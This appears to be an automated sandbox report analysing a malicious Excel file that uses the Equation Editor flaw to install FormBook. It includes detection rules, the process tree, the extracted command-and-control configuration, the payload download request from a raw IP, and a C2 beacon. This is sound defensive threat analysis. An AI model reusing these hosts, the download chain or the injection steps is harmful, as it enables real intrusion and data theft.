Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Sajeeb09908976745344567.xlsx

Overview

General Information

Sample Name:Sajeeb09908976745344567.xlsx
Analysis ID:502271
MD5:ac493c2681477e3b56acbb570b8e41d9
SHA1:2d9019b6c2f57c6360b155957cb542ae61bbf728
SHA256:9efaa722d6e9df7c6628df6d1f49d14d858b60782db11c3f1e9b5037803b290b
Tags:FormbookVelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Drops PE files to the user directory
Dropped file seen in connection with other malware
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 284 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2540 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1292 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0031A23B4BB6ABCDCCC5F8122DE5FCB5)
      • vbc.exe (PID: 2072 cmdline: 'C:\Users\Public\vbc.exe' MD5: 0031A23B4BB6ABCDCCC5F8122DE5FCB5)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • netsh.exe (PID: 1864 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: 784A50A6A09C25F011C3143DDD68E729)
            • cmd.exe (PID: 2544 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Sigma Overview

      Exploits:

      barindex
      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.110.172, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2540, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
      Sigma detected: File Dropped By EQNEDT32EXEShow sources
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2540, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

      System Summary:

      barindex
      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2540, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1292
      Sigma detected: Execution from Suspicious FolderShow sources
      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2540, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 1292

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.naplesconciergerealty.com/mxnu/"], "decoy": ["insightmyhome.com", "gabriellamaxey.com", "029atk.xyz", "marshconstructions.com", "technichoffghosts.com", "blue-ivy-boutique-au.com", "1sunsetgroup.com", "elfkuhnispb.store", "caoliudh.club", "verifiedpaypal.net", "jellyice-tr.com", "gatescres.com", "bloomberq.online", "crystaltopagent.net", "uggs-line.com", "ecommerceplatform.xyz", "historyofcambridge.com", "sattaking-gaziabad.xyz", "digisor.com", "beachpawsmobilegrooming.com", "whitebot.xyz", "zacky6.online", "qlfa8gzk8f.com", "scottjasonfowler.com", "influxair.com", "desongli.com", "xn--w7uy63f0ne2sj.com", "pinup722bk.com", "haohuatour.com", "dharmathinkural.com", "hanjyu.com", "tbrhc.com", "clarityflux.com", "meltonandcompany.com", "revgeek.com", "onehigh.club", "closetu.com", "yama-nkok.com", "brandonhistoryandinfo.com", "funkidsroomdecor.com", "epilasyonmerkeziankara.com", "265411.com", "watch12.online", "dealsbonaza.com", "gold2guide.art", "tomclark.online", "877961.com", "washingtonboatrentals.com", "promovart.com", "megapollice.online", "taquerialoteria.com", "foxsontreeservice.com", "safebookkeeping.com", "theeducationwheel.online", "sasanos.com", "procurovariedades.com", "normandia.pro", "ingdalynnia.xyz", "campusguideconsulting.com", "ashramseries.com", "clubcupids.art", "mortgagerates.solutions", "deepscanlabs.com", "insulated-box.com"]}
      Multi AV Scanner detection for submitted fileShow sources
      Source: Sajeeb09908976745344567.xlsxVirustotal: Detection: 29%Perma Link
      Source: Sajeeb09908976745344567.xlsxReversingLabs: Detection: 21%
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY
      Antivirus detection for URL or domainShow sources
      Source: www.naplesconciergerealty.com/mxnu/Avira URL Cloud: Label: malware
      Source: http://192.3.110.172/000900/vbc.exeAvira URL Cloud: Label: malware
      Multi AV Scanner detection for domain / URLShow sources
      Source: www.naplesconciergerealty.com/mxnu/Virustotal: Detection: 6%Perma Link
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 36%
      Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 36%
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
      Source: 5.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 8.2.netsh.exe.6d3da0.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 4.2.vbc.exe.3030000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
      Source: 8.2.netsh.exe.2c6796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 5.1.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

      Exploits:

      barindex
      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
      Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
      Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E93 FindFirstFileA,FindClose,4_2_00405E93
      Source: C:\Users\Public\vbc.exeCode function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_004054BD
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00402671 FindFirstFileA,4_2_00402671
      Source: global trafficDNS query: name: www.washingtonboatrentals.com
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop ebx5_2_00406AC1
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_0040C3E7
      Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi5_2_00415671
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop ebx8_2_00086AC1
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi8_2_0008C3E7
      Source: C:\Windows\SysWOW64\netsh.exeCode function: 4x nop then pop edi8_2_00095671
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.3.110.172:80

      Networking:

      barindex
      System process connects to network (likely due to code injection or exploit)Show sources
      Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.washingtonboatrentals.com
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: www.naplesconciergerealty.com/mxnu/
      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
      Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
      Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Oct 2021 17:03:16 GMTServer: Apache/2.4.50 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Wed, 13 Oct 2021 06:08:09 GMTETag: "46f39-5ce35c953b021"Accept-Ranges: bytesContent-Length: 290617Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 74 00 00 a0 00 00 00 00 d0 02 00 e0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 7c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 eb 5a 00 00 00 10 00 00 00 5c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 11 00 00 00 70 00 00 00 12 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 b0 01 00 00 90 00 00 00 06 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 e0 09 00 00 00 d0 02 00 00 0a 00 00 00 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
      Source: global trafficHTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
      Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: vbc.exe, vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: vbc.exe, 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.490591816.0000000000409000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: explorer.exe, 00000006.00000000.510963296.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
      Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: vbc.exe, 00000004.00000002.494713869.0000000001F10000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.516768137.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
      Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: explorer.exe, 00000006.00000000.504048013.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: explorer.exe, 00000006.00000000.521763552.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: explorer.exe, 00000006.00000000.514857516.0000000008118000.00000004.00000001.sdmpString found in binary or memory: http://www.mozilla.com0
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/c
      Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
      Source: explorer.exe, 00000006.00000000.544811252.000000000447A000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000006.00000000.547402382.00000000083E6000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerv
      Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
      Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE98A654.emfJump to behavior
      Source: unknownDNS traffic detected: queries for: www.washingtonboatrentals.com
      Source: global trafficHTTP traffic detected: GET /000900/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.110.172Connection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /mxnu/?0h=6lxhT6_0RrqDgXE0&bV8=5sVEEjOjrPj2idxjAkM9c91RRKirbtM3qCtWvXETAP1vtyCGbasEc4a0ZRfXFvjfhHczKQ== HTTP/1.1User-Agent: Windows ExplorerHost: www.washingtonboatrentals.com
      Source: C:\Users\Public\vbc.exeCode function: 4_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404FC2

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
